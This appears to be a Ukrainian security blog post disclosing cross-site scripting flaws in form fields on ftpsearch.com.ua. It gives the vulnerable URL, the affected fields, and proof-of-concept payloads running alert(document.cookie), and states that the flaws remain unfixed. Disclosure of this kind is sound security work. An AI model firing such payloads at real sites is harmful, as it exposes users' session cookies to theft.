Уразливості на ftpsearch.com.ua
19:40 06.01.200808.08.2007
У лютому, 09.02.2007 (а також додатково сьогодні), я знайшов Cross-Site Scripting уразливості на проекті ftpsearch.com.ua. Про що найближчим часом сповіщу адміністрацію проекту.
Детальна інформація про уразливості з’явиться пізніше.
06.01.2008
XSS:
http://ftpsearch.com.ua
POST запит на сторінці http://ftpsearch.com.ua/profiles.php?
sid=20070808&what=emailstory:
"><script>alert(document.cookie)</script>
В полях: Отправитель, Адрес отправителя, Получатель, Адрес получателя.
</textarea><script>alert(document.cookie)</script>
В полі: Короткое сообщение.
http://i.ftpsearch.com.ua
http://google.ftpsearch.com.ua
Дані уразливості досі не виправлені.